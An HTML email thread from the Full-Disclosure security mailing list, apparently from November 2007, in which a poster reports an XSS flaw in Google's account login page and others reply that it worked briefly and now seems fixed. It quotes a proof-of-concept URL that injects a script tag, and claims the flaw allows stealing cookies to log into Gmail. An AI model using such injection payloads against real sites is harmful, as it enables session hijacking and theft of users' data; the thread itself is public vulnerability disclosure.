well this XSS can lead to so much data being stolen that it is not even funny!<br><br><div class="gmail_quote">On Nov 8, 2007 8:55 PM, Juergen Marester <<a href="mailto:marester.juergen@gmail.com">marester.juergen@gmail.com
</a>> wrote:<br><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;"><div>wow ! 0day !</div>
<div>damn, right now 0day are fucking XSS ...<br><br> </div><div><div></div><div class="Wj3C7c">
<div><span class="gmail_quote">On 11/8/07, <b class="gmail_sendername">silky</b> <<a href="mailto:michaelslists@gmail.com" target="_blank">michaelslists@gmail.com</a>> wrote:</span>
<blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0px 0px 0px 0.8ex; padding-left: 1ex;">worked for me minutes after it was posted. seems fixed now.<br><br>On 11/9/07, crazy frog crazy frog <
<a href="mailto:i.m.crazy.frog@gmail.com" target="_blank">
i.m.crazy.frog@gmail.com</a>> wrote:<br>> i tested it on gmail latest version,itsnot working for me?<br>><br>> On Nov 8, 2007 7:04 AM, Scripter Hack <<a href="mailto:xss2root@gmail.com" target="_blank">xss2root@gmail.com
</a>
> wrote:<br>> > There is a html injection vulnerability in <a href="https://www.google.com" target="_blank">https://www.google.com</a>.<br>> > It is very critical,you can get the cookie to login into gmail ore other
<br>> > service.
<br>> ><br>> > POC:<br>> > <a href="https://www.google.com/accounts/ServiceLogin?service=mail&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&ltmpl=default&ltmplcache=2&passive=truel#" target="_blank">
https://www.google.com/accounts/ServiceLogin?service=mail&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&ltmpl=default&ltmplcache=2&passive=truel#</a>"></script><script>alert('xss')</script>&1-=1
<br>> ><br>> > More:<a href="http://xss2root.blogspot.com/" target="_blank">http://xss2root.blogspot.com/</a><br>> > _______________________________________________<br>> > Full-Disclosure - We believe in it.
<br>> > Charter:
<a href="http://lists.grok.org.uk/full-disclosure-charter.html" target="_blank">http://lists.grok.org.uk/full-disclosure-charter.html</a><br>> > Hosted and sponsored by Secunia - <a href="http://secunia.com/" target="_blank">
http://secunia.com/</a>
<br>> ><br>><br>><br>><br>> --<br>> advertise on secgeeks?<br>> <a href="http://secgeeks.com/Advertising_on_Secgeeks.com" target="_blank">http://secgeeks.com/Advertising_on_Secgeeks.com</a><br>>
<a href="http://newskicks.com" target="_blank">
http://newskicks.com</a><br>><br>> _______________________________________________<br>> Full-Disclosure - We believe in it.<br>> Charter: <a href="http://lists.grok.org.uk/full-disclosure-charter.html" target="_blank">
http://lists.grok.org.uk/full-disclosure-charter.html
</a><br>> Hosted and sponsored by Secunia - <a href="http://secunia.com/" target="_blank">http://secunia.com/</a><br>><br><br><br>--<br>mike<br><a href="http://lets.coozi.com.au/" target="_blank">http://lets.coozi.com.au/
</a><br><br>_______________________________________________
<br>Full-Disclosure - We believe in it.<br>Charter: <a href="http://lists.grok.org.uk/full-disclosure-charter.html" target="_blank">http://lists.grok.org.uk/full-disclosure-charter.html</a><br>Hosted and sponsored by Secunia -
<a href="http://secunia.com/" target="_blank">
http://secunia.com/</a><br></blockquote></div><br>
</div></div><br>_______________________________________________<br>Full-Disclosure - We believe in it.<br>Charter: <a href="http://lists.grok.org.uk/full-disclosure-charter.html" target="_blank">http://lists.grok.org.uk/full-disclosure-charter.html
</a><br>Hosted and sponsored by Secunia - <a href="http://secunia.com/" target="_blank">http://secunia.com/</a><br></blockquote></div><br><br clear="all"><br>-- <br>pdp (architect) | petko d. petkov<br><a href="http://www.gnucitizen.org">
http://www.gnucitizen.org</a>